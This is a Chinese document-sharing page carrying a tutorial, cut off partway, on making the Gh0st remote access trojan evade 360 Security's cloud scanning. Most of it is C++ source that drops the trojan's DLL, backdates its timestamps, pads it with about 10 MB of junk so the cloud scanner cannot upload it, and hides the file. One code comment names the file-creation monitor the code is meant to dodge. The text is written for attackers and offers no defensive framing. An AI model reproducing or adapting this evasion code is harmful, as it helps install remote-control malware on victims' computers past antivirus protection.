资源描述:
《附加垃圾数据》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀-360安全卫士,dll,垃圾,数据,释放给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀在一个论坛看到一种过云查杀的思路,也就是靠增大自身文件大小从而让云查杀软件无法上传分析你的服务端,下面是这个方法在Gh0st这个远控上面的应用:一:install工程BOOLReleaseResource(HMODULEhModule,WORDwResourceID,LPCTSTRlpType,LPCTSTRlpFileName,LPCTSTRlpConfigString){HGLOBALhRes;HRS
2、RChResInfo;HANDLEhFile;DWORDdwBytes;charstrTmpPath[MAX_PATH];charstrBinPath[MAX_PATH];//一定要跟别的区分开,GetTickCount有可能得到一样的值GetTempPath(sizeof(strTmpPath),strTmpPath);wsprintf(strBinPath,"%s\%d_res.tmp",strTmpPath,GetTickCount());hResInfo=FindResource(hModule,MAKEINTRESOURCE(wResourceID),lp
3、Type);if(hResInfo==NULL)returnFALSE;hRes=LoadResource(hModule,hResInfo);if(hRes==NULL)returnFALSE;hFile=CreateFile(strBinPath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);if(hFile==NULL)returnFALSE;SYSTEMTIMEst;memset(&st,0,sizeof(st));st.wYear=2004;st.w
4、Month=8;st.wDay=17;st.wHour=20;st.wMinute=0;FILETIMEft,LocalFileTime;SystemTimeToFileTime(&st,&ft);LocalFileTimeToFileTime(&ft,&LocalFileTime);SetFileTime(hFile,&LocalFileTime,(LPFILETIME)NULL,&LocalFileTime);WriteFile(hFile,hRes,SizeofResource(NULL,hResInfo),&dwBytes,NULL);//写入配置if(lpC
5、onfigString!=NULL){WriteFile(hFile,lpConfigString,lstrlen(lpConfigString)+1,&dwBytes,NULL);//给dll末尾添加垃圾附加数据以增大文件体积inti=0;char*szStrAdd;szStrAdd=newchar[1024*1024];memset(szStrAdd,'.',1024*1024);//这里循环10次,释放的dll大概就是10M了,如果想把dll再弄大点,修改这里就可以了while(i<10){WriteFile(hFile,szStrAdd,lstrlen(szS
6、trAdd),&dwBytes,NULL);i++;}}CloseHandle(hFile);FreeResource(hRes);//FuckKVFileCreateMonitorMoveFile(strBinPath,lpFileName);SetFileAttributes(lpFileName,FILE_ATTRIBUTE_HIDDEN);DeleteFile(strBinPath);returnTRUE;}二:svchost工程//#defineMAX_CONFIG_LEN1024//这句注释掉,改成下面的#defineMAX_CONFIG_LEN90000
7、/*这个数字大概为dll文件字节数的9/10左右就可以了,如上图,这个刚编译出来的dll文件大小为100,864字节,那么我这里把MAX_CONFIG_LEN改成100,864的9/10,就是90,000就可以了*/LPCTSTRFindConfigString(HMODULEhModule,LPCTSTRlpString){charstrFileName[MAX_PATH];char*lpConfigString=NULL;DWORDdwBytesRead=0;GetModuleFileName(hModule,strFileName,sizeof